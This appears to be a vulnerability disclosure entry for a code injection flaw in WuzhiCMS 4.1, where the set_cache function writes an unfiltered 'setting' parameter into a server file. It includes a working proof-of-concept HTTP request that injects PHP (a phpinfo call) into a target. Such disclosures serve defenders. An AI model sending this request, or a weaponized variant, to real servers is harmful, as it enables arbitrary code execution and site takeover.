| Title | wuzhicms 4.1 Code Injection |
|---|
| Description | Vulnerability Description
A file upload vulnerability exists in the set_cache function under the set module of WuzhiCMS 4.1. Attackers with administrator privileges can write malicious code into files on the server via the setting parameter, leading to arbitrary code execution. This vulnerability allows attackers to create or overwrite files on the server, thereby executing arbitrary PHP code.
Code Audit Process
By analyzing the code of WuzhiCMS 4.1, it was discovered that the set_cache function does not adequately filter or validate the setting parameter during processing, directly writing the content of the setting parameter into a file.
POC
GET /index.php?m=attachment&f=index&_su=wuzhicms&v=set&submit=1&setting=%3C?php%20echo%20phpinfo()?%3E HTTP/1.1
Host: target-ip
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close |
|---|
| Source | ⚠️ https://wiki.shikangsi.com/post/share/915aeba9-7d7c-4d7f-92e2-bbd5560de1a7 |
|---|
| User | XingYue_Mstir (UID 72225) |
|---|
| Submission | 04/02/2025 12:02 PM (4 months ago) |
|---|
| Moderation | 04/14/2025 12:46 AM (12 days later) |
|---|
| Status | Accepted |
|---|
| VulDB Entry | 304604 [WuzhiCMS 4.1 Setting set code injection] |
|---|
| Points | 20 |
|---|